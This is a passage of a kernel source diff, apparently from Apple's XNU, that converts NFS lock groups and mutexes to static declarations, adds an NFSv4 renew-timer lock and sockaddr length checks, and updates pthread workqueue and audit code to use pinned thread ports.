nfs_object_attr_bitmap[NFS_ATTR_BITMAP_LEN]; uint32_t nfs_getattr_bitmap[NFS_ATTR_BITMAP_LEN]; @@ -144,8 +145,8 @@ struct nfsclientidlist nfsclientids; /* NFS requests */ struct 
nfs_reqqhead nfs_reqq; -lck_grp_t *nfs_request_grp; -lck_mtx_t *nfs_request_mutex; +LCK_GRP_DECLARE(nfs_request_grp, "nfs_request"); +LCK_MTX_DECLARE(nfs_request_mutex, &nfs_request_grp); thread_call_t nfs_request_timer_call; int nfs_request_timer_on; u_int64_t nfs_xid = 0; @@ -154,7 +155,7 @@ u_int64_t nfs_xidwrap = 0; /* to build a (non-wrapping) 64 bit xid thread_call_t nfs_buf_timer_call; /* NFSv4 */ -lck_grp_t *nfs_open_grp; +LCK_GRP_DECLARE(nfs_open_grp, "nfs_open"); uint32_t nfs_open_owner_seqnum = 0; uint32_t nfs_lock_owner_seqnum = 0; thread_call_t nfs4_callback_timer_call; @@ -162,8 +163,8 @@ int nfs4_callback_timer_on = 0; char nfs4_default_domain[MAXPATHLEN]; /* nfsiod */ -lck_grp_t *nfsiod_lck_grp; -lck_mtx_t *nfsiod_mutex; +static LCK_GRP_DECLARE(nfsiod_lck_grp, "nfsiod"); +LCK_MTX_DECLARE(nfsiod_mutex, &nfsiod_lck_grp); struct nfsiodlist nfsiodfree, nfsiodwork; struct nfsiodmountlist nfsiodmounts; int nfsiod_thread_count = 0; @@ -322,26 +323,11 @@ nfs_vfs_init(__unused struct vfsconf *vfsp) TAILQ_INIT(&nfsiodfree); TAILQ_INIT(&nfsiodwork); TAILQ_INIT(&nfsiodmounts); - nfsiod_lck_grp = lck_grp_alloc_init("nfsiod", LCK_GRP_ATTR_NULL); - nfsiod_mutex = lck_mtx_alloc_init(nfsiod_lck_grp, LCK_ATTR_NULL); - - /* init lock groups, etc. 
*/ - nfs_mount_grp = lck_grp_alloc_init("nfs_mount", LCK_GRP_ATTR_NULL); - nfs_open_grp = lck_grp_alloc_init("nfs_open", LCK_GRP_ATTR_NULL); - nfs_global_grp = lck_grp_alloc_init("nfs_global", LCK_GRP_ATTR_NULL); - - nfs_global_mutex = lck_mtx_alloc_init(nfs_global_grp, LCK_ATTR_NULL); - - /* init request list mutex */ - nfs_request_grp = lck_grp_alloc_init("nfs_request", LCK_GRP_ATTR_NULL); - nfs_request_mutex = lck_mtx_alloc_init(nfs_request_grp, LCK_ATTR_NULL); /* initialize NFS request list */ TAILQ_INIT(&nfs_reqq); nfs_nbinit(); /* Init the nfsbuf table */ - nfs_nhinit(); /* Init the nfsnode table */ - nfs_lockinit(); /* Init the nfs lock state */ #if CONFIG_NFS_GSS nfs_gss_init(); /* Init RPCSEC_GSS security */ #endif @@ -1777,12 +1763,22 @@ nfs_convert_old_nfs_args(mount_t mp, user_addr_t data, vfs_context_t ctx, int ar /* convert address to universal address string */ if (ss.ss_family == AF_INET) { - sinaddr = &((struct sockaddr_in*)&ss)->sin_addr; + if (ss.ss_len != sizeof(struct sockaddr_in)) { + error = EINVAL; + } else { + sinaddr = &((struct sockaddr_in*)&ss)->sin_addr; + } } else if (ss.ss_family == AF_INET6) { - sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr; + if (ss.ss_len != sizeof(struct sockaddr_in6)) { + error = EINVAL; + } else { + sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr; + } } else { sinaddr = NULL; } + nfsmout_if(error); + if (!sinaddr || (inet_ntop(ss.ss_family, sinaddr, uaddr, sizeof(uaddr)) != uaddr)) { error = EINVAL; goto nfsmout; @@ -2377,6 +2373,7 @@ nfs4_mount( *npp = NULL; fh.fh_len = dirfh.fh_len = 0; + lck_mtx_init(&nmp->nm_timer_lock, &nfs_mount_grp, LCK_ATTR_NULL); TAILQ_INIT(&nmp->nm_open_owners); TAILQ_INIT(&nmp->nm_delegations); TAILQ_INIT(&nmp->nm_dreturnq); @@ -2776,7 +2773,7 @@ gotfh: } /* set up lease renew timer */ - nmp->nm_renew_timer = thread_call_allocate(nfs4_renew_timer, nmp); + nmp->nm_renew_timer = thread_call_allocate_with_options(nfs4_renew_timer, nmp, THREAD_CALL_PRIORITY_HIGH, 
THREAD_CALL_OPTIONS_ONCE); interval = nmp->nm_fsattr.nfsa_lease / 2; if (interval < 1) { interval = 1; @@ -2990,7 +2987,7 @@ mountnfs( } else { /* allocate an NFS mount structure for this mount */ nmp = zalloc_flags(nfsmnt_zone, Z_WAITOK | Z_ZERO); - lck_mtx_init(&nmp->nm_lock, nfs_mount_grp, LCK_ATTR_NULL); + lck_mtx_init(&nmp->nm_lock, &nfs_mount_grp, LCK_ATTR_NULL); TAILQ_INIT(&nmp->nm_resendq); TAILQ_INIT(&nmp->nm_iodq); TAILQ_INIT(&nmp->nm_gsscl); @@ -4583,7 +4580,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr) vfs_unmountbyfsid(&hinfo.fsid, 0, vfs_context_kernel()); } - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (!hinfo.mountcount) { /* no more ephemeral mounts - don't need timer */ nfs_ephemeral_mount_harvester_on = 0; @@ -4593,7 +4590,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr) thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline); nfs_ephemeral_mount_harvester_on = 1; } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); /* thread done */ thread_terminate(current_thread()); @@ -4607,9 +4604,9 @@ nfs_ephemeral_mount_harvester_start(void) { uint64_t deadline; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (nfs_ephemeral_mount_harvester_on) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } if (nfs_ephemeral_mount_harvester_timer == NULL) { @@ -4618,7 +4615,7 @@ nfs_ephemeral_mount_harvester_start(void) clock_interval_to_deadline(NFS_EPHEMERAL_MOUNT_HARVEST_INTERVAL, NSEC_PER_SEC, &deadline); thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline); nfs_ephemeral_mount_harvester_on = 1; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } #endif @@ -4635,7 +4632,10 @@ nfs3_check_lockmode(struct nfsmount *nmp, struct sockaddr *sa, int sotype, int t int error, port = 0; if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) { - bcopy(sa, 
&ss, sa->sa_len); + if (sa->sa_len > sizeof(ss)) { + return EINVAL; + } + bcopy(sa, &ss, MIN(sa->sa_len, sizeof(ss))); error = nfs_portmap_lookup(nmp, vfs_context_current(), (struct sockaddr*)&ss, NULL, RPCPROG_STAT, RPCMNT_VER1, NM_OMFLAG(nmp, MNTUDP) ? SOCK_DGRAM : sotype, timeo); if (!error) { if (ss.ss_family == AF_INET) { @@ -5077,10 +5077,13 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) /* cancel any renew timer */ if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_renew_timer) { + lck_mtx_lock(&nmp->nm_timer_lock); thread_call_cancel(nmp->nm_renew_timer); thread_call_free(nmp->nm_renew_timer); nmp->nm_renew_timer = NULL; + lck_mtx_unlock(&nmp->nm_timer_lock); } + #endif lck_mtx_unlock(&nmp->nm_lock); @@ -5102,14 +5105,14 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) #if CONFIG_NFS4 if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_longid) { /* remove/deallocate the client ID data */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); TAILQ_REMOVE(&nfsclientids, nmp->nm_longid, nci_link); if (nmp->nm_longid->nci_id) { FREE(nmp->nm_longid->nci_id, M_TEMP); } FREE(nmp->nm_longid, M_TEMP); nmp->nm_longid = NULL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } #endif /* @@ -5117,7 +5120,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) * and removed from the resend queue. */ TAILQ_INIT(&resendq); - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(req, &nfs_reqq, r_chain) { if (req->r_nmp == nmp) { lck_mtx_lock(&req->r_mtx); @@ -5142,7 +5145,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) lck_mtx_unlock(&req->r_mtx); } } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* Since we've drop the request mutex we can now safely unreference the request */ TAILQ_FOREACH_SAFE(req, &resendq, r_rchain, treq) { @@ -5159,8 +5162,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) * local iod queue for processing. 
*/ TAILQ_INIT(&iodq); - lck_mtx_lock(nfs_request_mutex); - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfs_request_mutex); + lck_mtx_lock(&nfsiod_mutex); TAILQ_FOREACH(req, &nfs_reqq, r_chain) { if (req->r_nmp == nmp) { lck_mtx_lock(&req->r_mtx); @@ -5188,8 +5191,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) TAILQ_REMOVE(&nfsiodmounts, nmp, nm_iodlink); } TAILQ_CONCAT(&iodq, &nmp->nm_iodq, r_achain); - lck_mtx_unlock(nfsiod_mutex); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfsiod_mutex); + lck_mtx_unlock(&nfs_request_mutex); TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) { TAILQ_REMOVE(&iodq, req, r_achain); @@ -5294,11 +5297,17 @@ nfs_mount_cleanup(struct nfsmount *nmp) lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_destroy(&nmp->nm_lock, nfs_mount_grp); + lck_mtx_destroy(&nmp->nm_lock, &nfs_mount_grp); if (nmp->nm_fh) { NFS_ZFREE(nfs_fhandle_zone, nmp->nm_fh); } +#if CONFIG_NFS4 + if (nmp->nm_vers >= NFS_VER4) { + lck_mtx_destroy(&nmp->nm_timer_lock, &nfs_mount_grp); + } +#endif + NFS_ZFREE(nfsmnt_zone, nmp); } @@ -6685,7 +6694,7 @@ ustat_skip: * how long the threads have been waiting. 
*/ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); lck_mtx_lock(&nmp->nm_lock); /* @@ -6704,19 +6713,19 @@ ustat_skip: if (req->oldptr == USER_ADDR_NULL) { // Caller is querying buffer size lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return SYSCTL_OUT(req, NULL, totlen); } if (req->oldlen < totlen) { // Check if caller's buffer is big enough lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return ERANGE; } MALLOC(nsp, struct netfs_status *, totlen, M_TEMP, M_WAITOK | M_ZERO); if (nsp == NULL) { lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return ENOMEM; } timeoutmask = NFSSTA_TIMEO | NFSSTA_LOCKTIMEO | NFSSTA_JUKEBOXTIMEO; @@ -6760,7 +6769,7 @@ ustat_skip: } lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); error = SYSCTL_OUT(req, nsp, totlen); FREE(nsp, M_TEMP); diff --git a/bsd/nfs/nfs_vnops.c b/bsd/nfs/nfs_vnops.c index b03463b43..caa5533f5 100644 --- a/bsd/nfs/nfs_vnops.c +++ b/bsd/nfs/nfs_vnops.c @@ -4481,13 +4481,13 @@ again_relock: } /* lock the node while we remove the file */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); while (np->n_hflag & NHLOCKED) { np->n_hflag |= NHLOCKWANT; - msleep(np, nfs_node_hash_mutex, PINOD, "nfs_remove", NULL); + msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_remove", NULL); } np->n_hflag |= NHLOCKED; - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if (!namedattrs) { nfs_dulookup_init(dul, dnp, cnp->cn_nameptr, cnp->cn_namelen, ctx); @@ -4510,13 +4510,13 @@ again: if (!inuse || (np->n_sillyrename && (nvattr->nva_nlink > 1))) { if (!inuse && !flushed) { /* flush all the buffers first */ /* unlock the node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); np->n_hflag &= ~NHLOCKED; if 
(np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); nfs_node_clear_busy2(dnp, np); error = nfs_vinvalbuf(vp, V_SAVE, ctx, 1); FSDBG(260, np, np->n_size, np->n_vattr.nva_size, 0xf00d0011); @@ -4569,13 +4569,13 @@ again: * again if another object gets created with the same filehandle * before this vnode gets reclaimed */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (np->n_hflag & NHHASHED) { LIST_REMOVE(np, n_hash); np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* clear flags now: won't get nfs_vnop_inactive for recycled vnode */ /* clear all flags other than these */ nfs_node_lock_force(np); @@ -4613,13 +4613,13 @@ again: } out: /* unlock the node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); np->n_hflag &= ~NHLOCKED; if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); nfs_node_clear_busy2(dnp, np); if (setsize) { ubc_setsize(vp, 0); @@ -4758,13 +4758,13 @@ nfs_vnop_rename( if (tvp && (tvp != fvp)) { /* lock the node while we rename over the existing file */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); while (tnp->n_hflag & NHLOCKED) { tnp->n_hflag |= NHLOCKWANT; - msleep(tnp, nfs_node_hash_mutex, PINOD, "nfs_rename", NULL); + msleep(tnp, &nfs_node_hash_mutex, PINOD, "nfs_rename", NULL); } tnp->n_hflag |= NHLOCKED; - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); locked = 1; } @@ -4819,7 +4819,7 @@ nfs_vnop_rename( tvprecycle = (!error && !vnode_isinuse(tvp, 0) && (nfs_getattrcache(tnp, nvattr, 0) || (nvattr->nva_nlink == 1))); nfs_node_unlock(tnp); - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (tvprecycle && 
(tnp->n_hflag & NHHASHED)) { /* * remove nfsnode from hash now so we can't accidentally find it @@ -4830,7 +4830,7 @@ nfs_vnop_rename( tnp->n_hflag &= ~NHHASHED; FSDBG(266, 0, tnp, tnp->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } /* purge the old name cache entries and enter the new one */ @@ -4878,13 +4878,13 @@ out: nfs_getattr(tdnp, NULL, ctx, NGA_CACHED); if (locked) { /* unlock node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); tnp->n_hflag &= ~NHLOCKED; if (tnp->n_hflag & NHLOCKWANT) { tnp->n_hflag &= ~NHLOCKWANT; wakeup(tnp); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } nfs_node_clear_busy4(fdnp, fnp, tdnp, tnp); FREE(nvattr, M_TEMP); @@ -5561,13 +5561,13 @@ nfsmout: * again if another object gets created with the same filehandle * before this vnode gets reclaimed */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (np->n_hflag & NHHASHED) { LIST_REMOVE(np, n_hash); np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } NFS_ZFREE(nfs_req_zone, req); FREE(dul, M_TEMP); @@ -5857,8 +5857,8 @@ out: * Invalidate cached directory information, except for the actual directory * blocks (which are invalidated separately). */ -void -nfs_invaldir(nfsnode_t dnp) +static void +nfs_invaldir_cookies(nfsnode_t dnp) { if (vnode_vtype(NFSTOV(dnp)) != VDIR) { return; @@ -5873,6 +5873,13 @@ nfs_invaldir(nfsnode_t dnp) memset(dnp->n_cookiecache->next, -1, NFSNUMCOOKIES); } +void +nfs_invaldir(nfsnode_t dnp) +{ + + nfs_invaldir_cookies(dnp); +} + /* * calculate how much space is available for additional directory entries. 
*/ @@ -6037,7 +6044,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp) dpptc = NULL; found = 0; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); /* * Scan the list of buffers, keeping them in order. * Note that itercomplete inserts each of the remaining buffers @@ -6099,7 +6106,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp) } nfs_buf_itercomplete(dnp, &blist, NBI_CLEAN); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (found) { OSAddAtomic64(1, &nfsstats.direofcache_hits); return 0; @@ -6250,7 +6257,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn lbn = nextlbn; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (found) { dnp->n_lastdbl = lbn; goto done; @@ -6323,7 +6330,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn } done: - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (!error && found && !purge) { error = nfs_nget(NFSTOMP(dnp), dnp, cnp, fh->fh_data, @@ -6402,7 +6409,7 @@ nfs3_readdir_rpc(nfsnode_t dnp, struct nfsbuf *bp, vfs_context_t ctx) nmrsize = nmp->nm_rsize; bigcookies = nmp->nm_state & NFSSTA_BIGCOOKIES; fh = zalloc(nfs_fhandle_zone); -noplus: +resend: rdirplus = ((nfsvers > NFS_VER2) && NMFLAG(nmp, RDIRPLUS)) ? 
1 : 0; if ((lockerror = nfs_node_lock(dnp))) { @@ -6483,7 +6490,9 @@ noplus: lck_mtx_lock(&nmp->nm_lock); NFS_BITMAP_CLR(nmp->nm_flags, NFS_MFLAG_RDIRPLUS); lck_mtx_unlock(&nmp->nm_lock); - goto noplus; + nfsm_chain_cleanup(&nmreq); + nfsm_chain_cleanup(&nmrep); + goto resend; } nfsmout_if(error); @@ -7758,7 +7767,9 @@ nfs_vnop_ioctl( if (!auth_is_kerberized(mp->nm_auth)) { return ENOTSUP; } - error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx)); + if ((error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx))) == ENOENT) { + error = 0; + } break; case NFS_IOC_SET_CRED: case NFS_IOC_SET_CRED64: @@ -8298,11 +8309,11 @@ nfs_vnop_pageout( xsize = f_offset + size - off; } lbn = (daddr64_t)(off / biosize); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if ((bp = nfs_buf_incore(np, lbn))) { FSDBG(323, off, bp, bp->nb_lflags, bp->nb_flags); if (nfs_buf_acquire(bp, NBAC_NOWAIT, 0, 0)) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_data_unlock_noupdate(np); /* no panic. 
just tell vm we are busy */ if (!nofreeupl) { @@ -8352,7 +8363,7 @@ nfs_vnop_pageout( nfsbufdelwricnt++; nfs_buf_drop(bp); nfs_buf_delwri_push(1); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_data_unlock_noupdate(np); if (!nofreeupl) { ubc_upl_abort_range(pl, pl_offset, size, 0); @@ -8371,12 +8382,12 @@ nfs_vnop_pageout( FSDBG(323, bp, bp->nb_dirtyoff, bp->nb_dirtyend, 0xd00dee00); /* we're leaving this block dirty */ nfs_buf_drop(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); continue; } } nfs_buf_remfree(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); SET(bp->nb_flags, NB_INVAL); nfs_node_lock_force(np); if (ISSET(bp->nb_flags, NB_NEEDCOMMIT)) { @@ -8387,7 +8398,7 @@ nfs_vnop_pageout( nfs_node_unlock(np); nfs_buf_release(bp, 1); } else { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } diff --git a/bsd/nfs/nfsmount.h b/bsd/nfs/nfsmount.h index e34b4fbc0..4fb5cd680 100644 --- a/bsd/nfs/nfsmount.h +++ b/bsd/nfs/nfsmount.h @@ -314,6 +314,7 @@ struct nfsmount { uint64_t mounttime; /* used as client ID verifier */ uint64_t clientid; /* client ID, short form */ thread_call_t renew_timer; /* RENEW timer call */ + lck_mtx_t timer_lock; /* RENEW timer lock */ nfs_fsid fsid; /* NFS file system id */ TAILQ_HEAD(, nfsnode) delegations; /* list of nodes with delegations */ TAILQ_HEAD(, nfsnode) dreturnq; /* list of nodes with delegations to return */ @@ -419,6 +420,7 @@ struct nfsmount { #define nm_mounttime nm_un.v4.mounttime #define nm_fsid nm_un.v4.fsid #define nm_renew_timer nm_un.v4.renew_timer +#define nm_timer_lock nm_un.v4.timer_lock #define nm_cbid nm_un.v4.cbid #define nm_cblink nm_un.v4.cblink #define nm_cbrefs nm_un.v4.cbrefs diff --git a/bsd/nfs/nfsnode.h b/bsd/nfs/nfsnode.h index 7f7f80293..43a2f5d65 100644 --- a/bsd/nfs/nfsnode.h +++ b/bsd/nfs/nfsnode.h @@ -215,7 +215,7 @@ struct nfsbuf { LIST_HEAD(nfsbuflists, nfsbuf); TAILQ_HEAD(nfsbuffreehead, nfsbuf); -extern 
lck_mtx_t *nfs_buf_mutex; +extern lck_mtx_t nfs_buf_mutex; extern int nfsbufcnt, nfsbufmin, nfsbufmax, nfsbufmetacnt, nfsbufmetamax; extern int nfsbuffreecnt, nfsbuffreemetacnt, nfsbufdelwricnt, nfsneedbuffer; extern int nfs_nbdwrite; @@ -431,7 +431,7 @@ struct nfs_vattr { } while (0) -extern lck_grp_t *nfs_open_grp; +extern lck_grp_t nfs_open_grp; extern uint32_t nfs_open_owner_seqnum, nfs_lock_owner_seqnum; /* @@ -799,7 +799,7 @@ struct nfsnode { #define NFSTOV(np) ((np)->n_vnode) /* nfsnode hash table mutex */ -extern lck_mtx_t *nfs_node_hash_mutex; +extern lck_mtx_t nfs_node_hash_mutex; /* * printf-like helper macro that also outputs node name. @@ -822,7 +822,7 @@ TAILQ_HEAD(nfsiodlist, nfsiod); TAILQ_HEAD(nfsiodmountlist, nfsmount); extern struct nfsiodlist nfsiodfree, nfsiodwork; extern struct nfsiodmountlist nfsiodmounts; -extern lck_mtx_t *nfsiod_mutex; +extern lck_mtx_t nfsiod_mutex; #if defined(KERNEL) diff --git a/bsd/nfs/nfsrvcache.h b/bsd/nfs/nfsrvcache.h index 9c92b00c1..d6db9b7e9 100644 --- a/bsd/nfs/nfsrvcache.h +++ b/bsd/nfs/nfsrvcache.h @@ -125,8 +125,5 @@ struct nfsrvcache { #define RC_INETADDR 0x20 #define RC_NAM 0x40 -extern lck_grp_t *nfsrv_reqcache_lck_grp; -extern lck_mtx_t *nfsrv_reqcache_mutex; - #endif /* __APPLE_API_PRIVATE */ #endif /* _NFS_NFSRVCACHE_H_ */ diff --git a/bsd/pthread/pthread_shims.c b/bsd/pthread/pthread_shims.c index 86e618e7d..5cddcd166 100644 --- a/bsd/pthread/pthread_shims.c +++ b/bsd/pthread/pthread_shims.c @@ -512,6 +512,7 @@ static const struct pthread_callbacks_s pthread_callbacks = { .ipc_port_copyout_send = ipc_port_copyout_send, .task_get_ipcspace = get_task_ipcspace, .vm_map_page_info = vm_map_page_info, + .ipc_port_copyout_send_pinned = ipc_port_copyout_send_pinned, .thread_set_wq_state32 = thread_set_wq_state32, #if !defined(__arm__) .thread_set_wq_state64 = thread_set_wq_state64, @@ -535,11 +536,16 @@ static const struct pthread_callbacks_s pthread_callbacks = { .semaphore_signal_internal_trap = 
semaphore_signal_internal_trap, .current_map = _current_map, .thread_create = thread_create, + /* should be removed once rdar://70892168 lands */ + .thread_create_pinned = thread_create_pinned, + .thread_create_immovable = thread_create_immovable, + .thread_terminate_pinned = thread_terminate_pinned, .thread_resume = thread_resume, .kevent_workq_internal = kevent_workq_internal, .convert_thread_to_port = convert_thread_to_port, + .convert_thread_to_port_pinned = convert_thread_to_port_pinned, .proc_get_stack_addr_hint = proc_get_stack_addr_hint, .proc_set_stack_addr_hint = proc_set_stack_addr_hint, diff --git a/bsd/pthread/pthread_workqueue.c b/bsd/pthread/pthread_workqueue.c index bc4bd4812..e6d06d3f5 100644 --- a/bsd/pthread/pthread_workqueue.c +++ b/bsd/pthread/pthread_workqueue.c @@ -1540,8 +1540,12 @@ workq_open(struct proc *p, __unused struct workq_open_args *uap, priority_queue_init(&wq->wq_constrained_queue); priority_queue_init(&wq->wq_special_queue); - wq->wq_delayed_call = thread_call_allocate_with_options( - workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL, + /* We are only using the delayed thread call for the constrained pool + * which can't have work at >= UI QoS and so we can be fine with a + * UI QoS thread call. + */ + wq->wq_delayed_call = thread_call_allocate_with_qos( + workq_add_new_threads_call, p, THREAD_QOS_USER_INTERACTIVE, THREAD_CALL_OPTIONS_ONCE); wq->wq_immediate_call = thread_call_allocate_with_options( workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL, @@ -2835,11 +2839,14 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos, /* * Compute a metric for many how many threads are active. We find the - * highest priority request outstanding and then add up the number of - * active threads in that and all higher-priority buckets. We'll also add - * any "busy" threads which are not active but blocked recently enough that - * we can't be sure they've gone idle yet. 
We'll then compare this metric - * to our max concurrency to decide whether to add a new thread. + * highest priority request outstanding and then add up the number of active + * threads in that and all higher-priority buckets. We'll also add any + * "busy" threads which are not currently active but blocked recently enough + * that we can't be sure that they won't be unblocked soon and start + * being active again. + * + * We'll then compare this metric to our max concurrency to decide whether + * to add a new thread. */ uint32_t busycount, thactive_count; @@ -2869,7 +2876,7 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos, thactive_count, busycount, 0); } - if (busycount && may_start_timer) { + if (may_start_timer) { /* * If this is called from the add timer, we won't have another timer * fire when the thread exits the "busy" state, so rearm the timer. @@ -3270,8 +3277,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq, workq_thread_reset_pri(wq, uth, req, /*unpark*/ true); - thread_unfreeze_base_pri(uth->uu_thread); -#if 0 // to turn this back on if (__improbable(thread_unfreeze_base_pri(uth->uu_thread) && !is_creator)) { if (req_ts) { workq_perform_turnstile_operation_locked(wq, ^{ @@ -3284,7 +3289,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq, WQ_TRACE_WQ(TRACE_wq_select_threadreq | DBG_FUNC_NONE, wq, 3, 0, 0, 0); goto park_thawed; } -#endif /* * We passed all checks, dequeue the request, bind to it, and set it up @@ -3355,9 +3359,7 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq, park: thread_unfreeze_base_pri(uth->uu_thread); -#if 0 // park_thawed: -#endif workq_park_and_unlock(p, wq, uth, setup_flags); } @@ -3540,10 +3542,12 @@ workq_setup_and_run(proc_t p, struct uthread *uth, int setup_flags) } if (uth->uu_workq_thport == MACH_PORT_NULL) { - /* convert_thread_to_port() consumes a reference */ + /* convert_thread_to_port_pinned() consumes a 
reference */ thread_reference(th); - ipc_port_t port = convert_thread_to_port(th); - uth->uu_workq_thport = ipc_port_copyout_send(port, get_task_ipcspace(p->task)); + /* Convert to immovable/pinned thread port, but port is not pinned yet */ + ipc_port_t port = convert_thread_to_port_pinned(th); + /* Atomically, pin and copy out the port */ + uth->uu_workq_thport = ipc_port_copyout_send_pinned(port, get_task_ipcspace(p->task)); } /* diff --git a/bsd/security/audit/audit_arg.c b/bsd/security/audit/audit_arg.c index 472b15372..c4ed65792 100644 --- a/bsd/security/audit/audit_arg.c +++ b/bsd/security/audit/audit_arg.c @@ -806,7 +806,9 @@ audit_arg_vnpath(struct kaudit_record *ar, struct vnode *vp, u_int64_t flags) if (*vnode_mac_labelp != NULL) { mac.m_buflen = MAC_AUDIT_LABEL_LEN; mac.m_string = *vnode_mac_labelp; - mac_vnode_label_externalize_audit(vp, &mac); + if (mac_vnode_label_externalize_audit(vp, &mac)) { + return; + } } } #endif diff --git a/bsd/security/audit/audit_mac.c b/bsd/security/audit/audit_mac.c index 18567474f..82f9b256d 100644 --- a/bsd/security/audit/audit_mac.c +++ 